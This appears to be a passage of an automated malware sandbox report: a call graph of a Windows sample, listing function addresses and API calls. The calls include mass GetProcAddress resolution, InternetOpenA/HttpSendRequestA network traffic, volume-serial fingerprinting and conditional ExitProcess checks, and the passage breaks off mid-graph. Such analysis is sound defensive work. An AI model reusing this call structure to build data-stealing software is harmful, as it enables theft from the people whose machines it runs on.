14005->14006 14007 5e2dee 14006->14007 14008 5e45c0 2 API calls 14007->14008 14009 5e2e07 14008->14009 14010 5e45c0 2 API calls 14009->14010 14011 5e2e20 14010->14011 14012 5e45c0 2 API calls 14011->14012 14013 5e2e39 14012->14013 14014 5e45c0 2 API calls 14013->14014 14015 5e2e52 14014->14015 14016 5e45c0 2 API calls 14015->14016 14017 5e2e6b 14016->14017 14018 5e45c0 2 API calls 14017->14018 14019 5e2e84 14018->14019 14020 5e45c0 2 API calls 14019->14020 14021 5e2e9d 14020->14021 14022 5e45c0 2 API calls 14021->14022 14023 5e2eb6 14022->14023 14024 5e45c0 2 API calls 14023->14024 14025 5e2ecf 14024->14025 14026 5e45c0 2 API calls 14025->14026 14027 5e2ee8 14026->14027 14028 5e45c0 2 API calls 14027->14028 14029 5e2f01 14028->14029 14030 5e45c0 2 API calls 14029->14030 14031 5e2f1a 14030->14031 14032 5e45c0 2 API calls 14031->14032 14033 5e2f33 14032->14033 14034 5e45c0 2 API calls 14033->14034 14035 5e2f4c 14034->14035 14036 5e45c0 2 API calls 14035->14036 14037 5e2f65 14036->14037 14038 5e45c0 2 API calls 14037->14038 14039 5e2f7e 14038->14039 14040 5e45c0 2 API calls 14039->14040 14041 5e2f97 14040->14041 14042 5e45c0 2 API calls 14041->14042 14043 5e2fb0 14042->14043 14044 5e45c0 2 API calls 14043->14044 14045 5e2fc9 14044->14045 14046 5e45c0 2 API calls 14045->14046 14047 5e2fe2 14046->14047 14048 5e45c0 2 API calls 14047->14048 14049 5e2ffb 14048->14049 14050 5e45c0 2 API calls 14049->14050 14051 5e3014 14050->14051 14052 5e45c0 2 API calls 14051->14052 14053 5e302d 14052->14053 14054 5e45c0 2 API calls 14053->14054 14055 5e3046 14054->14055 14056 5e45c0 2 API calls 14055->14056 14057 5e305f 14056->14057 14058 5e45c0 2 API calls 14057->14058 14059 5e3078 14058->14059 14060 5e45c0 2 API calls 14059->14060 14061 5e3091 14060->14061 14062 5e45c0 2 API calls 14061->14062 14063 5e30aa 14062->14063 14064 5e45c0 2 API calls 14063->14064 14065 5e30c3 14064->14065 14066 5e45c0 2 API calls 14065->14066 14067 5e30dc 14066->14067 14068 5e45c0 2 API calls 14067->14068 14069 5e30f5 14068->14069 14070 5e45c0 2 API calls 14069->14070 14071 5e310e 14070->14071 14072 5e45c0 2 API calls 14071->14072 14073 5e3127 14072->14073 14074 5e45c0 2 API calls 14073->14074 14075 5e3140 14074->14075 14076 5e45c0 2 API calls 14075->14076 14077 5e3159 14076->14077 14078 5e45c0 2 API calls 14077->14078 14079 5e3172 14078->14079 14080 5e45c0 2 API calls 14079->14080 14081 5e318b 14080->14081 14082 5e45c0 2 API calls 14081->14082 14083 5e31a4 14082->14083 14084 5e45c0 2 API calls 14083->14084 14085 5e31bd 14084->14085 14086 5e45c0 2 API calls 14085->14086 14087 5e31d6 14086->14087 14088 5e45c0 2 API calls 14087->14088 14089 5e31ef 14088->14089 14090 5e45c0 2 API calls 14089->14090 14091 5e3208 14090->14091 14092 5e45c0 2 API calls 14091->14092 14093 5e3221 14092->14093 14094 5e45c0 2 API calls 14093->14094 14095 5e323a 14094->14095 14096 5e45c0 2 API calls 14095->14096 14097 5e3253 14096->14097 14098 5e45c0 2 API calls 14097->14098 14099 5e326c 14098->14099 14100 5e45c0 2 API calls 14099->14100 14101 5e3285 14100->14101 14102 5e45c0 2 API calls 14101->14102 14103 5e329e 14102->14103 14104 5e45c0 2 API calls 14103->14104 14105 5e32b7 14104->14105 14106 5e45c0 2 API calls 14105->14106 14107 5e32d0 14106->14107 14108 5e45c0 2 API calls 14107->14108 14109 5e32e9 14108->14109 14110 5e45c0 2 API calls 14109->14110 14111 5e3302 14110->14111 14112 5e45c0 2 API calls 14111->14112 14113 5e331b 14112->14113 14114 5e45c0 2 API calls 14113->14114 14115 5e3334 14114->14115 14116 5e45c0 2 API calls 14115->14116 14117 5e334d 14116->14117 14118 5e45c0 2 API calls 14117->14118 14119 5e3366 14118->14119 14120 5e45c0 2 API calls 14119->14120 14121 5e337f 14120->14121 14122 5e45c0 2 API calls 14121->14122 14123 5e3398 14122->14123 14124 5e45c0 2 API calls 14123->14124 14125 5e33b1 14124->14125 14126 5e45c0 2 API calls 14125->14126 14127 5e33ca 14126->14127 14128 5e45c0 2 API calls 14127->14128 14129 5e33e3 14128->14129 14130 5e45c0 2 API calls 14129->14130 14131 5e33fc 14130->14131 14132 5e45c0 2 API calls 14131->14132 14133 5e3415 14132->14133 14134 5e45c0 2 API calls 14133->14134 14135 5e342e 14134->14135 14136 5e45c0 2 API calls 14135->14136 14137 5e3447 14136->14137 14138 5e45c0 2 API calls 14137->14138 14139 5e3460 14138->14139 14140 5e45c0 2 API calls 14139->14140 14141 5e3479 14140->14141 14142 5e45c0 2 API calls 14141->14142 14143 5e3492 14142->14143 14144 5e45c0 2 API calls 14143->14144 14145 5e34ab 14144->14145 14146 5e45c0 2 API calls 14145->14146 14147 5e34c4 14146->14147 14148 5e45c0 2 API calls 14147->14148 14149 5e34dd 14148->14149 14150 5e45c0 2 API calls 14149->14150 14151 5e34f6 14150->14151 14152 5e45c0 2 API calls 14151->14152 14153 5e350f 14152->14153 14154 5e45c0 2 API calls 14153->14154 14155 5e3528 14154->14155 14156 5e45c0 2 API calls 14155->14156 14157 5e3541 14156->14157 14158 5e45c0 2 API calls 14157->14158 14159 5e355a 14158->14159 14160 5e45c0 2 API calls 14159->14160 14161 5e3573 14160->14161 14162 5e45c0 2 API calls 14161->14162 14163 5e358c 14162->14163 14164 5e45c0 2 API calls 14163->14164 14165 5e35a5 14164->14165 14166 5e45c0 2 API calls 14165->14166 14167 5e35be 14166->14167 14168 5e45c0 2 API calls 14167->14168 14169 5e35d7 14168->14169 14170 5e45c0 2 API calls 14169->14170 14171 5e35f0 14170->14171 14172 5e45c0 2 API calls 14171->14172 14173 5e3609 14172->14173 14174 5e45c0 2 API calls 14173->14174 14175 5e3622 14174->14175 14176 5e45c0 2 API calls 14175->14176 14177 5e363b 14176->14177 14178 5e45c0 2 API calls 14177->14178 14179 5e3654 14178->14179 14180 5e45c0 2 API calls 14179->14180 14181 5e366d 14180->14181 14182 5e45c0 2 API calls 14181->14182 14183 5e3686 14182->14183 14184 5e45c0 2 API calls 14183->14184 14185 5e369f 14184->14185 14186 5e45c0 2 API calls 14185->14186 14187 5e36b8 14186->14187 14188 5e45c0 2 API calls 14187->14188 14189 5e36d1 14188->14189 14190 5e45c0 2 API calls 14189->14190 14191 5e36ea 14190->14191 14192 5e45c0 2 API calls 14191->14192 14193 5e3703 14192->14193 14194 5e45c0 2 API calls 14193->14194 14195 5e371c 14194->14195 14196 5e45c0 2 API calls 14195->14196 14197 5e3735 14196->14197 14198 5e45c0 2 API calls 14197->14198 14199 5e374e 14198->14199 14200 5e45c0 2 API calls 14199->14200 14201 5e3767 14200->14201 14202 5e45c0 2 API calls 14201->14202 14203 5e3780 14202->14203 14204 5e45c0 2 API calls 14203->14204 14205 5e3799 14204->14205 14206 5e45c0 2 API calls 14205->14206 14207 5e37b2 14206->14207 14208 5e45c0 2 API calls 14207->14208 14209 5e37cb 14208->14209 14210 5e45c0 2 API calls 14209->14210 14211 5e37e4 14210->14211 14212 5e45c0 2 API calls 14211->14212 14213 5e37fd 14212->14213 14214 5e45c0 2 API calls 14213->14214 14215 5e3816 14214->14215 14216 5e45c0 2 API calls 14215->14216 14217 5e382f 14216->14217 14218 5e45c0 2 API calls 14217->14218 14219 5e3848 14218->14219 14220 5e45c0 2 API calls 14219->14220 14221 5e3861 14220->14221 14222 5e45c0 2 API calls 14221->14222 14223 5e387a 14222->14223 14224 5e45c0 2 API calls 14223->14224 14225 5e3893 14224->14225 14226 5e45c0 2 API calls 14225->14226 14227 5e38ac 14226->14227 14228 5e45c0 2 API calls 14227->14228 14229 5e38c5 14228->14229 14230 5e45c0 2 API calls 14229->14230 14231 5e38de 14230->14231 14232 5e45c0 2 API calls 14231->14232 14233 5e38f7 14232->14233 14234 5e45c0 2 API calls 14233->14234 14235 5e3910 14234->14235 14236 5e45c0 2 API calls 14235->14236 14237 5e3929 14236->14237 14238 5e45c0 2 API calls 14237->14238 14239 5e3942 14238->14239 14240 5e45c0 2 API calls 14239->14240 14241 5e395b 14240->14241 14242 5e45c0 2 API calls 14241->14242 14243 5e3974 14242->14243 14244 5e45c0 2 API calls 14243->14244 14245 5e398d 14244->14245 14246 5e45c0 2 API calls 14245->14246 14247 5e39a6 14246->14247 14248 5e45c0 2 API calls 14247->14248 14249 5e39bf 14248->14249 14250 5e45c0 2 API calls 14249->14250 14251 5e39d8 14250->14251 14252 5e45c0 2 API calls 14251->14252 14253 5e39f1 14252->14253 14254 5e45c0 2 API calls 14253->14254 14255 5e3a0a 14254->14255 14256 5e45c0 2 API calls 14255->14256 14257 5e3a23 14256->14257 14258 5e45c0 2 API calls 14257->14258 14259 5e3a3c 14258->14259 14260 5e45c0 2 API calls 14259->14260 14261 5e3a55 14260->14261 14262 5e45c0 2 API calls 14261->14262 14263 5e3a6e 14262->14263 14264 5e45c0 2 API calls 14263->14264 14265 5e3a87 14264->14265 14266 5e45c0 2 API calls 14265->14266 14267 5e3aa0 14266->14267 14268 5e45c0 2 API calls 14267->14268 14269 5e3ab9 14268->14269 14270 5e45c0 2 API calls 14269->14270 14271 5e3ad2 14270->14271 14272 5e45c0 2 API calls 14271->14272 14273 5e3aeb 14272->14273 14274 5e45c0 2 API calls 14273->14274 14275 5e3b04 14274->14275 14276 5e45c0 2 API calls 14275->14276 14277 5e3b1d 14276->14277 14278 5e45c0 2 API calls 14277->14278 14279 5e3b36 14278->14279 14280 5e45c0 2 API calls 14279->14280 14281 5e3b4f 14280->14281 14282 5e45c0 2 API calls 14281->14282 14283 5e3b68 14282->14283 14284 5e45c0 2 API calls 14283->14284 14285 5e3b81 14284->14285 14286 5e45c0 2 API calls 14285->14286 14287 5e3b9a 14286->14287 14288 5e45c0 2 API calls 14287->14288 14289 5e3bb3 14288->14289 14290 5e45c0 2 API calls 14289->14290 14291 5e3bcc 14290->14291 14292 5e45c0 2 API calls 14291->14292 14293 5e3be5 14292->14293 14294 5e45c0 2 API calls 14293->14294 14295 5e3bfe 14294->14295 14296 5e45c0 2 API calls 14295->14296 14297 5e3c17 14296->14297 14298 5e45c0 2 API calls 14297->14298 14299 5e3c30 14298->14299 14300 5e45c0 2 API calls 14299->14300 14301 5e3c49 14300->14301 14302 5e45c0 2 API calls 14301->14302 14303 5e3c62 14302->14303 14304 5e45c0 2 API calls 14303->14304 14305 5e3c7b 14304->14305 14306 5e45c0 2 API calls 14305->14306 14307 5e3c94 14306->14307 14308 5e45c0 2 API calls 14307->14308 14309 5e3cad 14308->14309 14310 5e45c0 2 API calls 14309->14310 14311 5e3cc6 14310->14311 14312 5e45c0 2 API calls 14311->14312 14313 5e3cdf 14312->14313 14314 5e45c0 2 API calls 14313->14314 14315 5e3cf8 14314->14315 14316 5e45c0 2 API calls 14315->14316 14317 5e3d11 14316->14317 14318 5e45c0 2 API calls 14317->14318 14319 5e3d2a 14318->14319 14320 5e45c0 2 API calls 14319->14320 14321 5e3d43 14320->14321 14322 5e45c0 2 API calls 14321->14322 14323 5e3d5c 14322->14323 14324 5e45c0 2 API calls 14323->14324 14325 5e3d75 14324->14325 14326 5e45c0 2 API calls 14325->14326 14327 5e3d8e 14326->14327 14328 5e45c0 2 API calls 14327->14328 14329 5e3da7 14328->14329 14330 5e45c0 2 API calls 14329->14330 14331 5e3dc0 14330->14331 14332 5e45c0 2 API calls 14331->14332 14333 5e3dd9 14332->14333 14334 5e45c0 2 API calls 14333->14334 14335 5e3df2 14334->14335 14336 5e45c0 2 API calls 14335->14336 14337 5e3e0b 14336->14337 14338 5e45c0 2 API calls 14337->14338 14339 5e3e24 14338->14339 14340 5e45c0 2 API calls 14339->14340 14341 5e3e3d 14340->14341 14342 5e45c0 2 API calls 14341->14342 14343 5e3e56 14342->14343 14344 5e45c0 2 API calls 14343->14344 14345 5e3e6f 14344->14345 14346 5e45c0 2 API calls 14345->14346 14347 5e3e88 14346->14347 14348 5e45c0 2 API calls 14347->14348 14349 5e3ea1 14348->14349 14350 5e45c0 2 API calls 14349->14350 14351 5e3eba 14350->14351 14352 5e45c0 2 API calls 14351->14352 14353 5e3ed3 14352->14353 14354 5e45c0 2 API calls 14353->14354 14355 5e3eec 14354->14355 14356 5e45c0 2 API calls 14355->14356 14357 5e3f05 14356->14357 14358 5e45c0 2 API calls 14357->14358 14359 5e3f1e 14358->14359 14360 5e45c0 2 API calls 14359->14360 14361 5e3f37 14360->14361 14362 5e45c0 2 API calls 14361->14362 14363 5e3f50 14362->14363 14364 5e45c0 2 API calls 14363->14364 14365 5e3f69 14364->14365 14366 5e45c0 2 API calls 14365->14366 14367 5e3f82 14366->14367 14368 5e45c0 2 API calls 14367->14368 14369 5e3f9b 14368->14369 14370 5e45c0 2 API calls 14369->14370 14371 5e3fb4 14370->14371 14372 5e45c0 2 API calls 14371->14372 14373 5e3fcd 14372->14373 14374 5e45c0 2 API calls 14373->14374 14375 5e3fe6 14374->14375 14376 5e45c0 2 API calls 14375->14376 14377 5e3fff 14376->14377 14378 5e45c0 2 API calls 14377->14378 14379 5e4018 14378->14379 14380 5e45c0 2 API calls 14379->14380 14381 5e4031 14380->14381 14382 5e45c0 2 API calls 14381->14382 14383 5e404a 14382->14383 14384 5e45c0 2 API calls 14383->14384 14385 5e4063 14384->14385 14386 5e45c0 2 API calls 14385->14386 14387 5e407c 14386->14387 14388 5e45c0 2 API calls 14387->14388 14389 5e4095 14388->14389 14390 5e45c0 2 API calls 14389->14390 14391 5e40ae 14390->14391 14392 5e45c0 2 API calls 14391->14392 14393 5e40c7 14392->14393 14394 5e45c0 2 API calls 14393->14394 14395 5e40e0 14394->14395 14396 5e45c0 2 API calls 14395->14396 14397 5e40f9 14396->14397 14398 5e45c0 2 API calls 14397->14398 14399 5e4112 14398->14399 14400 5e45c0 2 API calls 14399->14400 14401 5e412b 14400->14401 14402 5e45c0 2 API calls 14401->14402 14403 5e4144 14402->14403 14404 5e45c0 2 API calls 14403->14404 14405 5e415d 14404->14405 14406 5e45c0 2 API calls 14405->14406 14407 5e4176 14406->14407 14408 5e45c0 2 API calls 14407->14408 14409 5e418f 14408->14409 14410 5e45c0 2 API calls 14409->14410 14411 5e41a8 14410->14411 14412 5e45c0 2 API calls 14411->14412 14413 5e41c1 14412->14413 14414 5e45c0 2 API calls 14413->14414 14415 5e41da 14414->14415 14416 5e45c0 2 API calls 14415->14416 14417 5e41f3 14416->14417 14418 5e45c0 2 API calls 14417->14418 14419 5e420c 14418->14419 14420 5e45c0 2 API calls 14419->14420 14421 5e4225 14420->14421 14422 5e45c0 2 API calls 14421->14422 14423 5e423e 14422->14423 14424 5e45c0 2 API calls 14423->14424 14425 5e4257 14424->14425 14426 5e45c0 2 API calls 14425->14426 14427 5e4270 14426->14427 14428 5e45c0 2 API calls 14427->14428 14429 5e4289 14428->14429 14430 5e45c0 2 API calls 14429->14430 14431 5e42a2 14430->14431 14432 5e45c0 2 API calls 14431->14432 14433 5e42bb 14432->14433 14434 5e45c0 2 API calls 14433->14434 14435 5e42d4 14434->14435 14436 5e45c0 2 API calls 14435->14436 14437 5e42ed 14436->14437 14438 5e45c0 2 API calls 14437->14438 14439 5e4306 14438->14439 14440 5e45c0 2 API calls 14439->14440 14441 5e431f 14440->14441 14442 5e45c0 2 API calls 14441->14442 14443 5e4338 14442->14443 14444 5e45c0 2 API calls 14443->14444 14445 5e4351 14444->14445 14446 5e45c0 2 API calls 14445->14446 14447 5e436a 14446->14447 14448 5e45c0 2 API calls 14447->14448 14449 5e4383 14448->14449 14450 5e45c0 2 API calls 14449->14450 14451 5e439c 14450->14451 14452 5e45c0 2 API calls 14451->14452 14453 5e43b5 14452->14453 14454 5e45c0 2 API calls 14453->14454 14455 5e43ce 14454->14455 14456 5e45c0 2 API calls 14455->14456 14457 5e43e7 14456->14457 14458 5e45c0 2 API calls 14457->14458 14459 5e4400 14458->14459 14460 5e45c0 2 API calls 14459->14460 14461 5e4419 14460->14461 14462 5e45c0 2 API calls 14461->14462 14463 5e4432 14462->14463 14464 5e45c0 2 API calls 14463->14464 14465 5e444b 14464->14465 14466 5e45c0 2 API calls 14465->14466 14467 5e4464 14466->14467 14468 5e45c0 2 API calls 14467->14468 14469 5e447d 14468->14469 14470 5e45c0 2 API calls 14469->14470 14471 5e4496 14470->14471 14472 5e45c0 2 API calls 14471->14472 14473 5e44af 14472->14473 14474 5e45c0 2 API calls 14473->14474 14475 5e44c8 14474->14475 14476 5e45c0 2 API calls 14475->14476 14477 5e44e1 14476->14477 14478 5e45c0 2 API calls 14477->14478 14479 5e44fa 14478->14479 14480 5e45c0 2 API calls 14479->14480 14481 5e4513 14480->14481 14482 5e45c0 2 API calls 14481->14482 14483 5e452c 14482->14483 14484 5e45c0 2 API calls 14483->14484 14485 5e4545 14484->14485 14486 5e45c0 2 API calls 14485->14486 14487 5e455e 14486->14487 14488 5e45c0 2 API calls 14487->14488 14489 5e4577 14488->14489 14490 5e45c0 2 API calls 14489->14490 14491 5e4590 14490->14491 14492 5e45c0 2 API calls 14491->14492 14493 5e45a9 14492->14493 14494 5f9c10 14493->14494 14495 5fa036 8 API calls 14494->14495 14496 5f9c20 43 API calls 14494->14496 14497 5fa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14495->14497 14498 5fa146 14495->14498 14496->14495 14497->14498 14499 5fa216 14498->14499 14500 5fa153 8 API calls 14498->14500 14501 5fa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14499->14501 14502 5fa298 14499->14502 14500->14499 14501->14502 14503 5fa337 14502->14503 14504 5fa2a5 6 API calls 14502->14504 14505 5fa41f 14503->14505 14506 5fa344 9 API calls 14503->14506 14504->14503 14507 5fa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14505->14507 14508 5fa4a2 14505->14508 14506->14505 14507->14508 14509 5fa4dc 14508->14509 14510 5fa4ab GetProcAddress GetProcAddress 14508->14510 14511 5fa515 14509->14511 14512 5fa4e5 GetProcAddress GetProcAddress 14509->14512 14510->14509 14513 5fa612 14511->14513 14514 5fa522 10 API calls 14511->14514 14512->14511 14515 5fa67d 14513->14515 14516 5fa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14513->14516 14514->14513 14517 5fa69e 14515->14517 14518 5fa686 GetProcAddress 14515->14518 14516->14515 14519 5f5ca3 14517->14519 14520 5fa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14517->14520 14518->14517 14521 5e1590 14519->14521 14520->14519 15641 5e1670 14521->15641 14524 5fa7a0 lstrcpy 14525 5e15b5 14524->14525 14526 5fa7a0 lstrcpy 14525->14526 14527 5e15c7 14526->14527 14528 5fa7a0 lstrcpy 14527->14528 14529 5e15d9 14528->14529 14530 5fa7a0 lstrcpy 14529->14530 14531 5e1663 14530->14531 14532 5f5510 14531->14532 14533 5f5521 14532->14533 14534 5fa820 2 API calls 14533->14534 14535 5f552e 14534->14535 14536 5fa820 2 API calls 14535->14536 14537 5f553b 14536->14537 14538 5fa820 2 API calls 14537->14538 14539 5f5548 14538->14539 14540 5fa740 lstrcpy 14539->14540 14541 5f5555 14540->14541 14542 5fa740 lstrcpy 14541->14542 14543 5f5562 14542->14543 14544 5fa740 lstrcpy 14543->14544 14545 5f556f 14544->14545 14546 5fa740 lstrcpy 14545->14546 14566 5f557c 14546->14566 14547 5f51f0 20 API calls 14547->14566 14548 5f5643 StrCmpCA 14548->14566 14549 5f56a0 StrCmpCA 14550 5f57dc 14549->14550 14549->14566 14551 5fa8a0 lstrcpy 14550->14551 14552 5f57e8 14551->14552 14553 5fa820 2 API calls 14552->14553 14556 5f57f6 14553->14556 14554 5fa740 lstrcpy 14554->14566 14555 5fa820 lstrlen lstrcpy 14555->14566 14558 5fa820 2 API calls 14556->14558 14557 5f5856 StrCmpCA 14559 5f5991 14557->14559 14557->14566 14562 5f5805 14558->14562 14561 5fa8a0 lstrcpy 14559->14561 14560 5fa8a0 lstrcpy 14560->14566 14563 5f599d 14561->14563 14564 5e1670 lstrcpy 14562->14564 14565 5fa820 2 API calls 14563->14565 14586 5f5811 14564->14586 14567 5f59ab 14565->14567 14566->14547 14566->14548 14566->14549 14566->14554 14566->14555 14566->14557 14566->14560 14568 5f5a0b StrCmpCA 14566->14568 14576 5e1590 lstrcpy 14566->14576 14579 5f52c0 25 API calls 14566->14579 14582 5f578a StrCmpCA 14566->14582 14584 5f593f StrCmpCA 14566->14584 14585 5fa7a0 lstrcpy 14566->14585 14569 5fa820 2 API calls 14567->14569 14570 5f5a28 14568->14570 14571 5f5a16 Sleep 14568->14571 14572 5f59ba 14569->14572 14573 5fa8a0 lstrcpy 14570->14573 14571->14566 14574 5e1670 lstrcpy 14572->14574 14575 5f5a34 14573->14575 14574->14586 14577 5fa820 2 API calls 14575->14577 14576->14566 14578 5f5a43 14577->14578 14580 5fa820 2 API calls 14578->14580 14579->14566 14581 5f5a52 14580->14581 14583 5e1670 lstrcpy 14581->14583 14582->14566 14583->14586 14584->14566 14585->14566 14586->13639 14588 5f754c 14587->14588 14589 5f7553 GetVolumeInformationA 14587->14589 14588->14589 14590 5f7591 14589->14590 14591 5f75fc GetProcessHeap RtlAllocateHeap 14590->14591 14592 5f7619 14591->14592 14593 5f7628 wsprintfA 14591->14593 14594 5fa740 lstrcpy 14592->14594 14595 5fa740 lstrcpy 14593->14595 14596 5f5da7 14594->14596 14595->14596 14596->13660 14598 5fa7a0 lstrcpy 14597->14598 14599 5e4899 14598->14599 15650 5e47b0 14599->15650 14601 5e48a5 14602 5fa740 lstrcpy 14601->14602 14603 5e48d7 14602->14603 14604 5fa740 lstrcpy 14603->14604 14605 5e48e4 14604->14605 14606 5fa740 lstrcpy 14605->14606 14607 5e48f1 14606->14607 14608 5fa740 lstrcpy 14607->14608 14609 5e48fe 14608->14609 14610 5fa740 lstrcpy 14609->14610 14611 5e490b InternetOpenA StrCmpCA 14610->14611 14612 5e4944 14611->14612 14613 5e4ecb InternetCloseHandle 14612->14613 14614 5e4955 14612->14614 14616 5e4ee8 14613->14616 15661 5f8b60 14614->15661 15656 5e9ac0 CryptStringToBinaryA 14616->15656 14617 5e4963 15669 5fa920 14617->15669 14620 5e4976 14622 5fa8a0 lstrcpy 14620->14622 14627 5e497f 14622->14627 14623 5fa820 2 API calls 14624 5e4f05 14623->14624 14626 5fa9b0 4 API calls 14624->14626 14625 5e4f27 codecvt 14629 5fa7a0 lstrcpy 14625->14629 14628 5e4f1b 14626->14628 14631 5fa9b0 4 API calls 14627->14631 14630 5fa8a0 lstrcpy 14628->14630 14642 5e4f57 14629->14642 14630->14625 14632 5e49a9 14631->14632 14633 5fa8a0 lstrcpy 14632->14633 14634 5e49b2 14633->14634 14635 5fa9b0 4 API calls 14634->14635 14636 5e49d1 14635->14636 14637 5fa8a0 lstrcpy 14636->14637 14638 5e49da 14637->14638 14639 5fa920 3 API calls 14638->14639 14640 5e49f8 14639->14640 14641 5fa8a0 lstrcpy 14640->14641 14643 5e4a01 14641->14643 14642->13663 14644 5fa9b0 4 API calls 14643->14644 14645 5e4a20 14644->14645 14646 5fa8a0 lstrcpy 14645->14646 14647 5e4a29 14646->14647 14648 5fa9b0 4 API calls 14647->14648 14649 5e4a48 14648->14649 14650 5fa8a0 lstrcpy 14649->14650 14651 5e4a51 14650->14651 14652 5fa9b0 4 API calls 14651->14652 14653 5e4a7d 14652->14653 14654 5fa920 3 API calls 14653->14654 14655 5e4a84 14654->14655 14656 5fa8a0 lstrcpy 14655->14656 14657 5e4a8d 14656->14657 14658 5e4aa3 InternetConnectA 14657->14658 14658->14613 14659 5e4ad3 HttpOpenRequestA 14658->14659 14661 5e4ebe InternetCloseHandle 14659->14661 14662 5e4b28 14659->14662 14661->14613 14663 5fa9b0 4 API calls 14662->14663 14664 5e4b3c 14663->14664 14665 5fa8a0 lstrcpy 14664->14665 14666 5e4b45 14665->14666 14667 5fa920 3 API calls 14666->14667 14668 5e4b63 14667->14668 14669 5fa8a0 lstrcpy 14668->14669 14670 5e4b6c 14669->14670 14671 5fa9b0 4 API calls 14670->14671 14672 5e4b8b 14671->14672 14673 5fa8a0 lstrcpy 14672->14673 14674 5e4b94 14673->14674 14675 5fa9b0 4 API calls 14674->14675 14676 5e4bb5 14675->14676 14677 5fa8a0 lstrcpy 14676->14677 14678 5e4bbe 14677->14678 14679 5fa9b0 4 API calls 14678->14679 14680 5e4bde 14679->14680 14681 5fa8a0 lstrcpy 14680->14681 14682 5e4be7 14681->14682 14683 5fa9b0 4 API calls 14682->14683 14684 5e4c06 14683->14684 14685 5fa8a0 lstrcpy 14684->14685 14686 5e4c0f 14685->14686 14687 5fa920 3 API calls 14686->14687 14688 5e4c2d 14687->14688 14689 5fa8a0 lstrcpy 14688->14689 14690 5e4c36 14689->14690 14691 5fa9b0 4 API calls 14690->14691 14692 5e4c55 14691->14692 14693 5fa8a0 lstrcpy 14692->14693 14694 5e4c5e 14693->14694 14695 5fa9b0 4 API calls 14694->14695 14696 5e4c7d 14695->14696 14697 5fa8a0 lstrcpy 14696->14697 14698 5e4c86 14697->14698 14699 5fa920 3 API calls 14698->14699 14700 5e4ca4 14699->14700 14701 5fa8a0 lstrcpy 14700->14701 14702 5e4cad 14701->14702 14703 5fa9b0 4 API calls 14702->14703 14704 5e4ccc 14703->14704 14705 5fa8a0 lstrcpy 14704->14705 14706 5e4cd5 14705->14706 14707 5fa9b0 4 API calls 14706->14707 14708 5e4cf6 14707->14708 14709 5fa8a0 lstrcpy 14708->14709 14710 5e4cff 14709->14710 14711 5fa9b0 4 API calls 14710->14711 14712 5e4d1f 14711->14712 14713 5fa8a0 lstrcpy 14712->14713 14714 5e4d28 14713->14714 14715 5fa9b0 4 API calls 14714->14715 14716 5e4d47 14715->14716 14717 5fa8a0 lstrcpy 14716->14717 14718 5e4d50 14717->14718 14719 5fa920 3 API calls 14718->14719 14720 5e4d6e 14719->14720 14721 5fa8a0 lstrcpy 14720->14721 14722 5e4d77 14721->14722 14723 5fa740 lstrcpy 14722->14723 14724 5e4d92 14723->14724 14725 5fa920 3 API calls 14724->14725 14726 5e4db3 14725->14726 14727 5fa920 3 API calls 14726->14727 14728 5e4dba 14727->14728 14729 5fa8a0 lstrcpy 14728->14729 14730 5e4dc6 14729->14730 14731 5e4de7 lstrlen 14730->14731 14732 5e4dfa 14731->14732 14733 5e4e03 lstrlen 14732->14733 15675 5faad0 14733->15675 14735 5e4e13 HttpSendRequestA 14736 5e4e32 InternetReadFile 14735->14736 14737 5e4e67 InternetCloseHandle 14736->14737 14742 5e4e5e 14736->14742 14739 5fa800 14737->14739 14739->14661 14740 5fa9b0 4 API calls 14740->14742 14741 5fa8a0 lstrcpy 14741->14742 14742->14736 14742->14737 14742->14740 14742->14741 15677 5faad0 14743->15677 14745 5f17c4 StrCmpCA 14746 5f17cf ExitProcess 14745->14746 14748 5f17d7 14745->14748 14747 5f19c2 14747->13665 14748->14747 14749 5f187f StrCmpCA 14748->14749 14750 5f185d StrCmpCA 14748->14750 14751 5f1913 StrCmpCA 14748->14751 14752 5f1932 StrCmpCA 14748->14752 14753 5f18f1 StrCmpCA 14748->14753 14754 5f1951 StrCmpCA 14748->14754 14755 5f1970 StrCmpCA 14748->14755 14756 5f18cf StrCmpCA 14748->14756 14757 5f18ad StrCmpCA 14748->14757 14758 5fa820 lstrlen lstrcpy 14748->14758 14749->14748 14750->14748 14751->14748 14752->14748 14753->14748 14754->14748 14755->14748 14756->14748 14757->14748 14758->14748 14760 5fa7a0 lstrcpy 14759->14760 14761 5e5979 14760->14761 14762 5e47b0 2 API calls 14761->14762 14763 5e5985 14762->14763 14764 5fa740 lstrcpy 14763->14764 14765 5e59ba 14764->14765 14766 5fa740 lstrcpy 14765->14766 14767 5e59c7 14766->14767 14768 5fa740 lstrcpy 14767->14768 14769 5e59d4 14768->14769 14770 5fa740 lstrcpy 14769->14770 14771 5e59e1 14770->14771 14772 5fa740 lstrcpy 14771->14772 14773 5e59ee InternetOpenA StrCmpCA 14772->14773 14774 5e5a1d 14773->14774 14775 5e5fc3 InternetCloseHandle 14774->14775 14776 5f8b60 3 API calls 14774->14776 14777 5e5fe0 14775->14777 14778 5e5a3c 14776->14778 14780 5e9ac0 4 API calls 14777->14780 14779 5fa920 3 API calls 14778->14779 14781 5e5a4f 14779->14781 14782 5e5fe6 14780->14782 14783 5fa8a0 lstrcpy 14781->14783 14784 5fa820 2 API calls 14782->14784 14787 5e601f codecvt 14782->14787 14788 5e5a58 14783->14788 14785 5e5ffd 14784->14785 14786 5fa9b0 4 API calls 14785->14786 14789 5e6013 14786->14789 14791 5fa7a0 lstrcpy 14787->14791 14792 5fa9b0 4 API calls 14788->14792 14790 5fa8a0 lstrcpy 14789->14790 14790->14787 14800 5e604f 14791->14800 14793 5e5a82 14792->14793 14794 5fa8a0 lstrcpy 14793->14794 14795 5e5a8b 14794->14795 14796 5fa9b0 4 API calls 14795->14796 14797 5e5aaa 14796->14797 14798 5fa8a0 lstrcpy 14797->14798 14799 5e5ab3 14798->14799 14801 5fa920 3 API calls 14799->14801 14800->13671 14802 5e5ad1 14801->14802 14803 5fa8a0 lstrcpy 14802->14803 14804 5e5ada 14803->14804 14805 5fa9b0 4 API calls 14804->14805 14806 5e5af9 14805->14806 14807 5fa8a0 lstrcpy 14806->14807 14808 5e5b02 14807->14808 14809 5fa9b0 4 API calls 14808->14809 14810 5e5b21 14809->14810 14811 5fa8a0 lstrcpy 14810->14811 14812 5e5b2a 14811->14812 14813 5fa9b0 4 